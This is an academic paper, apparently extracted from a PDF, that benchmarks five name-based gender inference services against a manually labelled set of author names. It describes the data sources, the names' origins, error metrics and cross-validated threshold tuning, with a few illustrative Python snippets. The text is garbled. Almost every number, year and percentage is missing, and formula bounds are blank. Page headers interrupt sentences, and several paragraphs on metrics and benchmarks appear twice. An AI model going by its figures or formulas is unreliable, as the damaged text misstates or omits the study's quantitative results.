the us social security administration records. their analysis showed that authorships by women are not evenly distributed over the dimensions time, field, coauthorship, and authorship position. a similar approach was followed by larivière et al. ( a), who resorted to both universal and country-specific sources such as the us and quebec censuses, wikiname portal, wikipedia, and various internet sites to assign a gender to all articles between and indexed in wos. this resulted in more than , , articles and over , , authorship instances, % of which could be assigned a gender, provided a full first name was available. they reported significant gender disparities, such as fewer citations for articles with women in dominant author positions, as well as underrepresentation of women as first authors. analogous findings, but restricted to mathematics, were reported by mihaljević-brandt, santamaría & tullney ( ), who analyzed over , , publications from bibliographic service zbmath between and . using the names list from michael ( ), they could assign a gender to % of all authorship instances. most recently, holman, stuart-fox & hauser ( ) estimated the gender gap in stemm santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. disciplines with help of the pubmed and arxiv databases. 
thirty-six million authors with publications over the last years were assigned a gender using genderize.io, which is one of the services that we evaluate. their results confirm previously reported high variations of the gender gap across countries. furthermore, according to their data model, gender parity won’t be reached during this century in various fields, including mathematics, physics, and computer science. it is worth mentioning that all four above-mentioned studies performed some kind of validation of their gender inference methods, yet there is room for improvement regarding assessment of manual gender labels, data size, or reproducibility. for instance, holman, stuart-fox & hauser ( ) estimate their gender misclassification rate to be . % based on a collection of manually labeled author names via web searches. considering the expected name variance, an extrapolation of the error estimate to the entire data set does not seem reliable. despite its importance for estimating the error rate on gender assignments, only a few studies are devoted to comparing different gender inference tools. vanetta ( ) tested and compared four gender assignment methods (beauvoir, sexmachine, genderpredictor, and genderize.io) on a control group provided by a government office and consisting of over first names. no claims were made as to which one of the services was better, arguing that different purposes may pose different requirements to the services. karimi et al. ( ) used the test set from larivière et al. ( a) to evaluate precision, recall and accuracy of several methods, including data from various censuses, genderize.io, face recognition algorithm face++, and two novel approaches consisting of mixing the predictions of the latter two. they reported improved accuracy of the mixed methods, noting that the quality of the assignments depended on country and was worse for non- western regions. the brevity of the paper prevents an extended discussion regarding the definition of the quality metrics, particularly in the handling of the predicted unknowns. at any rate, face recognition techniques clearly hold potential, albeit they must be used with caution in view of their likely intrinsic bias, e.g., towards darker-skinned females (buolamwini, ). similarly, equating country of residence with regional origin of a name does not seem to be a well suited assumption, given that academics often move internationally. holman, stuart-fox & hauser ( ) also query genderize.io with the country of affiliation, potentially incurring the same bias. a more extensive comparison is that of wais ( ), who revisited the methods and results of larivière et al. ( a) and west et al. ( ), with the additional introduction of the r package genderizer based on the genderize.io service. to compare the three approaches, a common test data set was evaluated that contained , authorships of , articles manually labeled using internet searches. the results were compared in terms of the metrics described in ‘performance metrics’. the method based on genderize.io outperformed the others, at least with respect to metrics that focus on retrieving a gender for as many names as possible. the percentage of non-classifications was consequently the lowest. while genderize.io and genderizer seem to offer the best performance for gender prediction, the author points out the bias towards english names. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
table comparison table showing relevant features for the gender inference services under study. note that although gender api does provide a specific api end point for handling surnames, our results employ the version that does not make use of them. gender api gender-guesser genderize.io nameapi namsor database size (january ) , , , , , , , regular data updates yes no yes yes yes handles unstructured full name strings yes no no yes no handles surnames yes no no yes yes handles non-latin alphabets partially no partially yes yes implicit geo-localization no no no yes yes assignment type probabilistic binary probabilistic probabilistic probabilistic free parameters accuracy, samples – probability, count confidence scale open source no yes no no no api yes no yes yes yes monthly free requests unlimited , , , monthly subscription cost ( , requests/month) ¤ free ¤ ¤ ¤ provider gender-api.com israel saeta pérez casper strømgren optimaize gmbh namsor sas recently, bonham & stefan ( b) have published an analysis of female underrepre- sentation in the field of computational biology, for which they performed a preliminary comparison of three gender assignment tools (bonham & stefan, a). the methods tested were the python package genderdetector and web apis genderize.io and gender api. after inferring the gender of , names they ultimately chose gender api for its superior coverage. they did not compute further metrics to validate their election. lastly, a crucial discussion of the benefits as well as ethical concerns when using gender inference methods was posed in matias ( ), which presented a multitude of examples of meaningful projects that have applied such tools to various data sources. links to evaluations and comparisons of name-based gender inference services, including the open gender tracker, which the author co-developed, were provided as well. methods overview of surveyed services we compare five different services for inferring gender from name strings that are among the methods most frequently employed to perform gender assignments in the field of bibliometric studies. several of them are broadly used by organizations and companies in the private sector as well. table showcases key characteristics; below we briefly describe each of them. gender api gender api (https://gender-api.com/), a gender inference service launched in , offers a standard first name search with capability to handle double names. furthermore, the api allows queries with a full name, which is internally split into first and last. the service currently supports countries, although it cannot geo-localize a full name per se. its api santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://gender-api.com/ http://dx.doi.org/ . /peerj-cs. other python wrappers of the same data are genderator and sexmachine, but they are mostly unsupported and not python - compatible. accepts extra parameters for localized queries though, namely country code, ip address, and browser locale. the response contains gender assignments male, female, or unknown, plus confidence parameters samples and accuracy. the former is the number of database records matching the request, while the latter determines the reliability of the assignment. the service is built upon a combination of data from multiple sources, partially from publicly available governmental records combined with data crawled from social networks. each name has to be verified by different sources to be incorporated. 
the service is overall reliable, with its cloud-based infrastructure providing an availability of . %. python-package gender-guesser python package gender-guesser (https://pypi.python.org/pypi/gender-guesser/) implements a wrapper around the names data described in michael ( ), which was made available in michael ( ) . the data set comprises over , names with gender assignments unknown (name not found), andy (androgynous), male, female, mostly_male, or mostly_female. additionally, the approximate frequency of each name per country is provided, and the gender request can be made with an extra location parameter for better accuracy. the dictionary of names was published a decade ago and has not been updated since, which limits the usefulness of both the package and its underlying data source. on the other hand, the gender assignment of this collection is presumed to be of high quality, with manual checks by native speakers of various countries. genderize.io online service genderize.io (https://genderize.io/), created in august , attempts to infer the gender of a first name. the response is either male, female, or none, plus two additional confidence parameters, count and probability, representing the number of data entries used to calculate the response and the proportion of names with the gender returned in the response. the underlying data is collected from social networks across countries and languages. although the service does not geo-localize names automatically, it does accept two optional parameters, location_id and language_id, for more qualified guesses. the providers do not state the sources employed, hence the reliability of the data is difficult to assess. an api and extensions to various languages are available. there are no guarantees about uptime; the service might not be reliable enough for use in critical applications. nameapi nameapi (https://www.nameapi.org/) is a free and paid service platform to work with names. it provides functionality in the form of web services to do name parsing, genderizing, matching, formatting, and others. for our benchmark we have concentrated on the genderizing service only. its underlying data sources are dictionaries with all parts of names extracted from census publications, birth lists, and telephone books from over countries. original spellings in non-latin scripts (including transcriptions and transliterations) are also recorded. the gender response can be male, female, neutral, unknown, or indeterminable, weighted by the confidence parameter. the service is able to infer the most likely origin of the name, thus allowing to apply language-specific rules and to geo-localize names whose gender depend on the culture. the service aims to achieve santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://pypi.python.org/pypi/gender-guesser/ https://genderize.io/ https://www.nameapi.org/ http://dx.doi.org/ . /peerj-cs. high uptime, with . % availability. nameapi provides an api accessible either from a free or a paid account, with credits that can be purchased on a one-time or monthly subscription basis. namsor namsor (http://www.namsor.com/) is a classifier of personal names by gender, country of origin, or ethnicity. the service is able to recognize the linguistic or cultural origin of names, thus allowing it to correctly infer the gender from the first and last name in cases that can be male or female depending on their provenience. namsor claims to cover all languages, alphabets, countries, and regions. 
the underlying data consists of . million unique given names extracted from baby name statistics per country, plus sociolinguistic information (morphology, language, ethnicity, etc.) to extract semantics, which allows it to predict gender for complex cases. the namsor gender api returns male, female, or unknown values, plus a parameter scale ranging from − to + to reflect the certainty that a name is male or female, respectively. a basic api for structured names is available for free, whereas the freemium version accepts unstructured strings and offers higher performance and precision. namsor’s origin api recognizes the likely cultural provenience of personal names in any alphabet, returning a primary and an alternative potential country of origin, as well as a score to qualify the trustworthiness of the assignment. it is based on a proprietary onomastics model which uses linguistic and cultural information. assemblage of test data we have gathered, revised, and combined human-annotated author-gender data sets used in various bibliometric studies to date, which we describe below. zbmath randomly selected authors from the bibliographical records of the mathematical publications service zbmath (https://zbmath.org/), sampled in ignoring names that contained only initials. these authors were manually labeled as ‘female’, ‘male’ or ‘unknown’ by mihaljević-brandt, santamaría & tullney ( ) using internet queries to obtain gender information. more precisely, the concrete person behind an author’s name was identified by gathering author profile information from zbmath and other bibliographic databases. then, university websites, wikipedia articles, and similar online sources were searched for gender-indicating titles (mr, mrs, etc.) and personal pronouns corresponding to the according person. the zbmath data set consists of names ( male, female, unknown). genderizer sample data sets from the genderizer package (https://github.com/kalimu/genderizer), authorships and titles that correspond to records of articles of biographical-items or items- about-individual type, respectively, from all fields of study, published from to and drawn from wos. as described in wais ( ), the names in both data sets were manually coded as ‘female’, ‘male’, or ‘unknown’ based on results from internet queries using the authors’ full names, affiliations, biographies, mentions in the press, and photos. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.namsor.com/ https://zbmath.org/ https://github.com/kalimu/genderizer http://dx.doi.org/ . /peerj-cs. a name was deemed ‘unknown’ if the coder was not certain enough based on the found information. we have applied a series of preprocessing steps to this data, namely removal of duplicates and names containing only initials. for the ‘titles’ data set we have used a naive named-entity extractor based on python’s package nltk’s pos tagger to identify names in the articles’ titles. generally, ner tasks are better solved with more potent packages, such as stanford’s corenlp. in this case though, the small size of the data set allowed for a manual check of all extracted names to guarantee correctness. after revising both sources, genderize_r_titles and genderize_r_authors, the data set consists of , names ( male, female, unknown). pubmed data set from filardo et al. ( ), built by querying the six journals with highest jcr impact factor in in the category medicine, general & internal for original research articles between and . 
incidentally, this data has also been used to tune the gender assignment methods of bonham & stefan ( b). filardo et al. ( ) determined the gender of the first author of each of the articles as ‘female’, ‘male’, or ‘unknown’ by first inspecting the forename. if this was judged to be insufficient to assign a gender, the authors searched institutional websites, social media accounts, photographs, and biographical paragraphs to gather more information. we further removed duplicates and records with empty first names or initials only. the pubmed data set consists of , names ( , male, female, unknown). wos data set produced for the validation study reported in larivière et al. ( b) that informed the findings of larivière et al. ( a), consisting of records from the wos database covering all publications from to included in science citation index expanded, the social sciences citation index, and the arts and humanities citation index. from each of the five categories ‘initials’, ‘unknown’, ‘unisex’, ‘male’, and ‘female’, , names were randomly sampled and associated with a specific country, institution, and, in some cases, an email address. this information was used by larivière et al. ( a) to locate biographical information and, based on that, manually assign a gender. from this data set of , names we have further removed records from the ‘initials’ subset and duplicates with respect to the previous data sets. the final wos data set consists of , names ( , male, , female, , unknown). after concatenating all data sets we ran a sanity check consisting of finding names that had been consistently misclassified by all gender inference services, and performed manual corrections to amend incorrectly assigned labels. in total, we double-checked author names and manually changed the gender label of of them by searching preferably for personal pronouns, gender-indicating titles, and, ultimately, photos in university websites, professional social media sites, conference web pages, and similar sources. all undertaken preprocessing steps can be found in mihaljević & santamaría ( ). our final data set consists of , names ( , male, , female, , unknown), split into three components: first, middle, and last name. about % of them contain a middle name, and the number of unique combinations of first and middle name in the data santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. namsor provides a diaspora api to address onomastic classification for countries with historically high immigration rates like the usa. table examples of the geographical origins of names as inferred by namsor’s origin api. full_name gender source country top_region sub_region score maria bortolini f wos italy europe southern europe . liew woei kang m pubmed china asia eastern asia . sirin yasar f wos turkey asia western asia . set is , . the most common male names are ‘john’, ‘david’, and ‘michael’; the most frequent female ones are ‘susan’, ’christine’, ‘laura’, and ‘anne’. we point out that we use ‘female’ and ‘male’ as categories solely because the evaluated services operate under the gender binary paradigm; our concerns to this approach are spelled out in the discussion. to the best of our knowledge this collection is the largest sample of labeled gender data corresponding to authors of academic publications to date. in order to promote further research on the topic, we make our data set available to interested researchers (mihaljević & santamaría, ). 
origin of the names the assembled data set described above does not include any information regarding the origin or geographic provenience of the persons’ names. it is well known that the cultural context is an important aspect affecting the reliability of gender inference methods. we thus seek to evaluate the geographical and cultural diversity of our data set as well as to measure the impact of the names’ origins on the performance of the surveyed services. as described above, namsor’s origin api is able to produce an anthroponomical classification of a personal name by allocating an onomastic class, i.e., a country, subregion, and region, to it. the inferred origin is reported in conjunction with a score that calibrates its reliability. according to namsor’s internal evaluations, for names from europe, asia, and africa the classifications with score > are trustworthy. note that the usa is not considered an onomastic class on its own but rather a melting pot of other ‘cultural origins’ such as ireland or germany (carsenat, ) . similarly, names from other parts of the americas are considered to be of (southern) european descent. table shows a few examples of the anthroponomical classifications produced by namsor’s origin api. we have applied namsor’s origin api to our collection of , names and are able to assign a provenience to % ( , ) of them that return a score above , and that we keep for further analysis. the service was queried in may . namsor estimates , names ( %) to be of european origin, , ( %) of asian, and ( %) of african provenience. we have split the analysis by the different data sources; results are displayed in fig. . the wos collection contains approximately % asian and % european names; given the fact that wos is larger than any of the other data subsets, this ensures a satisfactory representation of asian names in the whole test data set. for the other data sources, names of european origin clearly predominate, especially in the genderize_r subsets. in short, our data set shows a majority of european and asian names; understandably for a sample coming from scientific publishing, the proportion of african names is small. a more fine-grained geographical analysis focusing on countries, rather than regions, reveals that the names in our test data originate from countries; however, just of santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. % % % % % % wos pubmed genderize_r_titles genderize_r_authors zbmath europe asia africa figure geographical region of origin of the personal names from our test data set as inferred by namsor’s origin api. the colored bars show percentages split by data sources. the genderize_r data sets are the most eurocentric, whereas the wos collection is more balanced towards asian names. african names amount to at most % per data source, which reflects the shortage of scholarly authors from that region. full-size doi: . /peerjcs. /fig- them already cover % of the whole data set. the most frequent country of origin is the uk, followed by germany, china, and ireland. splitting the analysis among the five data sources confirms that both genderize_r datasets are very eurocentric: they have almost no asian countries among the top most frequent ones. they also show the lowest diversity, with the top three countries (uk, germany, and ireland) covering % of all names and the top covering %. 
on the contrary, the highest variability appears in the smallest data set zbmath, where the top three countries (germany, japan, and the uk) contain % of all names and the top cover %. the larger wos data set exhibits the best representation of asian origins: china, japan, and korea appear in positions st, rd, and th in terms of frequency. full figures and statistics can be found in our dedicated jupyter notebook in mihaljević & santamaría ( ). the analysis of cultural and geographical provenience of the personal names contained in our data set brings us to the conclusion that our collection is reasonably diverse and shows an acceptable variability with respect to origin, with the aforementioned caveats about african names. retrieval of gender assignments we have performed systematic queries to the services under study to obtain an inferred gender for all records in our test data set. all queries were performed in mid december . depending on their peculiarities, we sent different requests to the various apis. concretely, genderize.io and gender-guesser do not handle last names, therefore we queried using first and middle names only. when both a first and a middle name were present we tried their combinations (e.g., ‘jae il’, alternatively ‘jae-il’). if no response was obtained, only the first name was used (e.g., ‘jae’). the free namsor api requires the name to be structured as split forename(s) and last name. gender api offers two distinct end points, one for forename(s) only and another capable of splitting unstructured full name strings. we evaluated both methods in our benchmark and found that the former performs notably better, thus we santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. report results for that variant. nameapi accepts unstructured strings per se. we tested it using the full name string and the forename(s) only, for better comparison with the name splitting mechanism of gender api. however, in this case querying with the full name string achieves significantly better results, hence we report the performance of nameapi for this variant. performance metrics name-based gender inference can be considered as a classification problem, and as such there exist plenty of metrics to measure the performance of a classifier. the choice of performance indicators needs to be suitable for the problem at hand and is usually a non-trivial task in the development of data-based algorithms. for further background readings related to classification and learning algorithms in general, such as training and testing, cross-validation, typical error estimates and statistical significance testing, see e.g., hastie, tibshirani & friedman ( ) and japkowicz & shah ( ). the names in our evaluation data set have been manually labeled as ‘female’, ‘male’, or ‘unknown’. recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient gender-related information online. therefore the class ‘unknown’ is rather a heterogeneous label applied to people with either very common names or those that avoid providing much personal information online. in particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in quantitative evaluations using performance metrics. 
in what follows, we will not make use of the items with manual label ‘unknown’ for any of our calculations and results, working instead with the , names in our data set which possess a defined gender label. (for a discussion of ethical considerations of name-based gender inference methods and the methodological shortcomings of such approaches, see the ‘discussion’.) on the other hand, the services evaluated here do return, along with the responses ‘female’ and ‘male’, at least a label ‘unknown’ for the unidentified cases. hence, in terms of the true labels we are dealing with a binary classification problem, while the predictions contain one or more extra output classes. this makes it difficult to pose name-based inference as a standard classification problem and to utilize commonly used metrics such as precision and recall. in our case it makes sense to work instead with metrics derived from the confusion matrix defined as follows: recall that those labeled as ‘unknown’ refer to individuals for whom it was not possible to find sufficient gender-related information online. therefore the class ‘unknown’ is rather a heterogeneous label applied to people with either very common names or those that avoid providing much personal information online. in particular, it is not a ‘gender class’ in any suitable sense, and cannot be included appropriately in quantitative evaluations using performance metrics. in what follows, we will not make use of the items with manual label ‘unknown’ for any of our calculations and results, working instead with the , names in our data set which possess a defined gender label. (for a discussion of ethical considerations of name-based gender inference methods and the methodological shortcomings of such approaches, see the discussion.) on the other hand, the services evaluated here do return, along with the responses ‘female’ and ‘male’, at least a label ‘unknown’ for the unidentified cases. hence, in terms of the true labels we are dealing with a binary classification problem, while the predictions contain one or more extra output classes. this makes it difficult to pose name-based inference as a standard classification problem and utilize commonly used metrics such as precision and recall. in our case it makes sense to work instead with metrics derived from the confusion matrix defined as follows: predicted class male female unknown tr ue cl as s male mm mf mu female fm ff fu let us introduce the following nomenclature for the components of the confusion matrix, which in general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications, while elements outside it (mf and fm) are thus misclassifications. the sum of both can be simply referred to as classifications. consequently, elements mu and fu represent non-classifications, since the algorithm fails at predicting one of the classes ‘male’ or ‘female’. all mistakes, both misclassifications and non- classifications, are included under the term inaccuracies. based on the confusion matrix, wais ( ) introduced four performance metrics: errorcoded = fm + mf + mu + fu mm + fm + mf + ff + mu + fu , errorcodedwithoutna = fm + mf mm + fm + mf + ff , nacoded = mu + fu mm + fm + mf + ff + mu + fu , errorgenderbias = mf − fm mm + fm + mf + ff . 
the errors above are to be interpreted as follows: errorcoded treats a non-classification as a regular er- ror and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies over the total number of assignments; errorcodedwithoutna measures the share of misclassifications over the total number of classifications while ignoring non-classifications; nacoded computes the proportion of non-classifications over the total number of assignments; errorgenderbias estimates the direction of the bias in gender prediction, indicating whether there are more females misclassified as male, or vice versa. if positive, then the estimated number of women is higher than in the real data. depending on the concrete usage of an algorithm, these metrics can be suitable or not. for instance, if not being able to assign a gender to a large number of names is acceptable while high prediction accuracy is essential, errorcodedwithoutna should be minimized. for most purposes, however, it is desirable to infer the gender for as many names as possible without treating non-classifications as a regular error. for this purpose we have defined two extensions of the metrics above. let w ∈ [ , ]. we define the weightederror as weightederrorw = fm + mf + w ∗(mu + fu) mm + fm + mf + ff + w ∗(mu + fu) . for w = the weightederror equals errorcodedwithoutna and for w = we recover errorcoded exactly. for < w < we define a metric which penalizes misclassifications more than non-classifications. to clarify this further, consider the following examples of confusion matrices: / peerj comput. sci. reviewing pdf | (cs- : : : : :new may ) manuscript to be reviewedcomputer science let us introduce the following nomenclature for the components of the confusion matrix, which in general we will refer to as assignments: elements in the diagonal (mm and ff) are the correct classifications, while elements outside it (mf and fm) are thus misclassifications. the sum of both can be simply referred to as classifications. consequently, elements mu and fu represent non-classifications, since the algorithm fails at predicting one of the classes santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘male’ or ‘female’. all mistakes, both misclassifications and non-classifications, are included under the term inaccuracies. based on the confusion matrix, wais ( ) introduced four performance metrics: errorcoded = fm+mf+mu+fu mm+fm+mf+ff+mu+fu , errorcodedwithoutna = fm+mf mm+fm+mf+ff , nacoded = mu+fu mm+fm+mf+ff+mu+fu , errorgenderbias = mf−fm mm+fm+mf+ff . the errors above are to be interpreted as follows: errorcoded treats a non-classification as a regular error and penalizes it in the same way as a misclassification, therefore it encodes the fraction of inaccuracies over the total number of assignments; errorcodedwithoutna measures the share of misclassifications over the total number of classifications while ignoring non-classifications; nacoded computes the proportion of non-classifications over the total number of assignments; errorgenderbias estimates the direction of the bias in gender prediction, indicating whether there are more females misclassified as male, or vice versa. if positive, then the estimated number of women is higher than in the real data. depending on the concrete usage of an algorithm, these metrics can be suitable or not. 
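a small, self-contained sketch of these four metrics, written here purely for illustration (the function and argument names are ours and do not come from the paper's own code):

    def wais_metrics(mm, mf, mu, fm, ff, fu):
        """compute the four confusion-matrix metrics defined above."""
        assignments = mm + mf + mu + fm + ff + fu   # everything the service returned
        classifications = mm + mf + fm + ff         # cases with an f/m prediction
        return {
            "errorcoded": (fm + mf + mu + fu) / assignments,
            "errorcodedwithoutna": (fm + mf) / classifications,
            "nacoded": (mu + fu) / assignments,
            "errorgenderbias": (mf - fm) / classifications,
        }

    # toy example: 900 correctly classified men, 30 men misread as women, 70 unclassified men, etc.
    print(wais_metrics(mm=900, mf=30, mu=70, fm=20, ff=850, fu=60))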
for instance, if not being able to assign a gender to a large number of names is acceptable while high prediction accuracy is essential, errorcodedwithoutna should be minimized. for most purposes, however, it is desirable to infer the gender for as many names as possible without treating non-classifications as a regular error. for this purpose we have defined two extensions of the metrics above. let w ∈ [ , ]. we define the weightederror as

weightederror_w = (fm + mf + w*(mu + fu)) / (mm + fm + mf + ff + w*(mu + fu)).

for w = the weightederror equals errorcodedwithoutna and for w = we recover errorcoded exactly. for < w < we define a metric which penalizes misclassifications more than non-classifications. to clarify this further, consider two example confusion matrices (true classes 'male' and 'female'; predicted classes 'male', 'female', and 'unknown') for which the fraction of inaccuracies over all assignments is the same, while one of them exhibits a smaller proportion of misclassifications because its number of non-classifications is larger. evaluating the weightederror with an intermediate weight w then yields a lower error for the matrix with more non-classifications, since non-classifications are only partially penalized.

another, even simpler possibility to penalize non-classifications without giving them the same importance as to misclassifications is to minimize a metric such as errorcodedwithoutna, which ignores the class 'unknown', while enforcing a constraint on nacoded, i.e., the rate of non-classifications. indeed any two metrics can be combined in this way. however, a disadvantage of this approach is that, for certain constraint values, there is no solution in the parameter space of a given gender inference model. thus, it makes sense to consider the distribution of error values depending on the tuning parameters before setting a definite constraint value. in our benchmarks, if the constraint cannot be satisfied on a training set, we have set the test set error to , which is the maximum achievable value.

results prior to parameter tuning and benchmarking

we have performed sample requests to all services in order to test potentially problematic cases, such as double names and diacritics. all services under study are sensitive towards accents and return different responses when e.g., applied to the names 'josé maría' and 'josé maria'. however, namsor and nameapi show less sensitivity than gender api and genderize.io. for instance, nameapi returns the same value of the free parameter for both 'jose'/'josé' and 'maria'/'maría', respectively, but makes a difference when queried with a double name. the handling of double names is actually not completely transparent for most of the services. in the cases of 'mary-jane' or 'jane-mary', gender api returns a count value resulting from adding those for 'mary' and 'jane'. this pattern persists when concatenating further names of the same gender, e.g., as in 'mary-jane-sarah'. yet when name parts are joined with empty space instead of hyphen, the count values are not added, which shows that a different logic is being applied. the response of genderize.io also depends on the character connecting the name parts. this indicates a low level of semantical preprocessing of the data sources for both services. we have found examples of similar behavior in namsor, while nameapi seems to be less susceptible to this kind of artifacts.

as pointed out in wais ( ), names used in social network profiles may contain arbitrary words or characters. this 'bogus data' is not filtered out of the underlying database of genderize.io, resulting in stop words like 'with' or 'i' having a gender assigned to them. the same is true to a similar extent for gender api, while nameapi and namsor show a higher level of data curation. the package gender-guesser contains a priori only vetted names. both nameapi and namsor make use of the surname in order to provide a more accurate gender guess for names which depend significantly on the cultural context. we tested this on a few examples such as 'andrea schmidt' vs. 'andrea bocelli' or 'rosario gonzález' vs. 'rosario giordano'; the two services responded with the expected gender categories, showing a correct identification of the surname with a particular country of origin. gender api and genderize.io do assign a gender to names like 'andrea' or 'rosario', but with lower accuracy values. when queried with unisex first names such as 'mika', 'addison', 'ash', or 'dakota', nameapi returns 'neutral' or 'unknown'. namsor, gender api, and genderize.io interpret some of these names as gender neutral by assigning a value of their free parameter close to , while gender-guesser also treats names as ambiguous via the qualifier mostly.

parameter tuning

all methods under study with exception of gender-guesser return, in addition to the gender, one or two numerical parameters to estimate the quality of the inference. figure shows the distribution of these free parameters when using nameapi, namsor, gender api, and genderize.io to assign genders to all names in our test data set. for gender-guesser (not displayed) we have created one such parameter by setting it to . for responses 'mostly_female' or 'mostly_male' and for 'female' or 'male'. figure a suggests that nameapi's parameter confidence exhibits a bimodal distribution that peaks at around . , with a secondary maximum at (absolute certainty on the gender assignment). all names reach a confidence of at least . . figure b indicates that namsor assigns a gender with absolute certainty to most of the names in the data set, although some outliers are spread out at smaller values of the scale parameter. figures c and d show the two-dimensional parameter spaces of gender api and genderize.io: one parameter encodes the number of appearances of a name (denominated samples and count, respectively), and the other shows the confidence on its gender assignment (named accuracy and probability). most names fall in the bottom right region of high confidence and low number of counts. in general, there is no mathematical model that can be trained in the classical sense of machine learning. instead, for every service, we have 'trained' (or 'tuned') the algorithms by trying out randomly sampled parameter values. assuming that a gender classification might not be reliable under some given threshold for the confidence indicators, we have searched for those parameter values that minimize a certain error.
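the sketch below illustrates this kind of threshold search in a simplified form: random candidate thresholds on a service's confidence parameter are evaluated with cross-validation, and the candidate minimizing the weighted error on the training folds is kept. it assumes a pandas dataframe with hypothetical columns 'true_gender', 'pred_gender', and 'confidence', plus a freely chosen weight; it is our own illustration, not the tuning code used for the paper:

    import numpy as np
    from sklearn.model_selection import KFold

    def weighted_error(df, w=0.5):
        # w is an arbitrary weight for non-classifications (0 < w < 1)
        mis = ((df.pred_gender != df.true_gender) & (df.pred_gender != "unknown")).sum()
        na = (df.pred_gender == "unknown").sum()
        ok = (df.pred_gender == df.true_gender).sum()
        return (mis + w * na) / (ok + mis + w * na)

    def apply_threshold(df, thr):
        # predictions whose confidence falls below the threshold become non-classifications
        out = df.copy()
        out.loc[out.confidence < thr, "pred_gender"] = "unknown"
        return out

    def tune_threshold(df, n_candidates=50, seed=0):
        rng = np.random.default_rng(seed)
        candidates = rng.uniform(df.confidence.min(), df.confidence.max(), n_candidates)
        cv = KFold(n_splits=10, shuffle=True, random_state=seed)
        best_thr, best_err = None, np.inf
        for thr in candidates:
            errs = [weighted_error(apply_threshold(df.iloc[train], thr))
                    for train, _ in cv.split(df)]
            if np.mean(errs) < best_err:
                best_thr, best_err = thr, float(np.mean(errs))
        return best_thr, best_err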
a particular instantiation of a random grid of sampled parameters used for each service (except gender-guesser) is displayed as black dots in fig. as well.

figure : distribution of free parameters after querying the gender inference services with all f/m names from our test data set. panels (a) nameapi (confidence) and (b) namsor (scale) return one parameter, while (c) gender api (samples, accuracy) and (d) genderize.io (count, probability) return two. in black, a particular instantiation of the grid of parameters per service used to perform parameter tuning is shown.

benchmark setting

we define a series of benchmarks to compare the methods under study. to begin with, we compute performance metrics using the default gender responses for all services, i.e., with no error minimization through parameter tuning (benchmark ). next, we introduce further benchmarks , , and , each of which concentrates on a particular scenario defined by conditions on the metrics to be optimized. all performed benchmarks are evaluated two-fold: (a) on the entire data set, and (b) differentiating between the five data sources as described in 'assemblage of test data'. the latter case is particularly relevant e.g., for researchers in scientometrics looking for the most suitable gender inference algorithm for a particular data source such as pubmed, whereas the former is most appropriate when analyzing different data collections, as e.g., in holman, stuart-fox & hauser ( ). to better illustrate the role of the names' origin, benchmark b is additionally broken down by geographical regions first and then by asian subregions, which turn out to be the most challenging. for benchmarks a, a, and a we run trials of -fold cross-validation. in each, we randomly select (at most) parameter values per service for training, and record the average error on the test sets with those parameters that minimized the respective error on the training sets. the tuning parameters as well as the training/test set splits are randomly selected with fixed seed numbers, thus ensuring reproducibility. in benchmarks b, b, and b we perform one trial of -fold cross-validation per service and data set, and record the average error on the test sets. since the individual data sets differ significantly in size, we have used at most parameters for the smaller data sets zbmath, genderize_r_authors and genderize_r_titles. for the larger data sets pubmed and wos, we have allowed at most and tuning parameters, respectively. finally, we apply several tests to assess the statistical significance of the observed differences. in the b-versions of our benchmarks, we first apply the non-parametric friedman test and then suitable post-hoc tests. we refrain from using anova, which is the usually recommended parametric alternative to evaluate multiple classifiers on multiple data sets, since the homogeneous covariance assumption is not satisfied across all services and data sets. in each benchmark, we compare the two best performers using suitable parametric or non-parametric tests for two classifiers. for more details on statistical significance tests suited for classification algorithms, see demšar ( ) and japkowicz & shah ( ), chapter . the code for the benchmark evaluations can be found in mihaljević & santamaría ( ).
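as a pointer to how such a comparison across several data sources can be run in practice, the snippet below applies the friedman test from scipy to a small, invented table of per-data-set errors (one list per service, one entry per data source); the numbers are made up purely for illustration:

    from scipy.stats import friedmanchisquare

    # hypothetical errorcodedwithoutna values on five data sources for four services
    gender_api = [0.021, 0.034, 0.018, 0.025, 0.030]
    genderize  = [0.028, 0.041, 0.022, 0.031, 0.036]
    namsor     = [0.024, 0.037, 0.020, 0.027, 0.033]
    nameapi    = [0.030, 0.045, 0.026, 0.034, 0.040]

    stat, p_value = friedmanchisquare(gender_api, genderize, namsor, nameapi)
    print(f"friedman chi-square = {stat:.3f}, p = {p_value:.4f}")
    # a small p-value suggests that at least one service differs; post-hoc pairwise tests
    # (e.g., wilcoxon signed-rank with a multiple-testing correction) would then say which.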
in each benchmark, we compare the two best performers using suitable parametric or non-parametric tests for two classifiers. for more details on statistical significance tests suited for classification algorithms, see demšar ( ) and japkowicz & shah ( )[chapter ]. the code for the benchmark evaluations can be found in mihaljević & santamaría ( ). benchmark : default responses first, we use the gender inference services employing their default responses, i.e., considering all ‘female’ and ‘male’ gender attributions regardless of the value of the confidence parameters. benchmark a: entire data set we report the resulting figures for correct classifications, misclassifications, and non- classifications per service on the entire data set in table , whereas table shows values of the various quality metrics. gender api exhibits the lowest fraction of inaccuracies, at . %. it also achieves the smallest proportion of non-classified names, a mere %. for both metrics, namsor is the next best performer, closely followed by genderize.io. note that the databases of gender api and namsor are about one order of magnitude larger than those of gender-guesser and genderize.io, therefore it is not surprising that they achieve a larger ratio of classified names. incidentally, nameapi incurs a comparatively high non-classification error, despite its relatively extensive database. regarding the metrics that ignore predicted ‘unknowns’ altogether, python package gender-guesser achieves the best results, with only . % of misclassifications, followed by nameapi. this means that, when considering only the proper classifications in the confusion matrix, 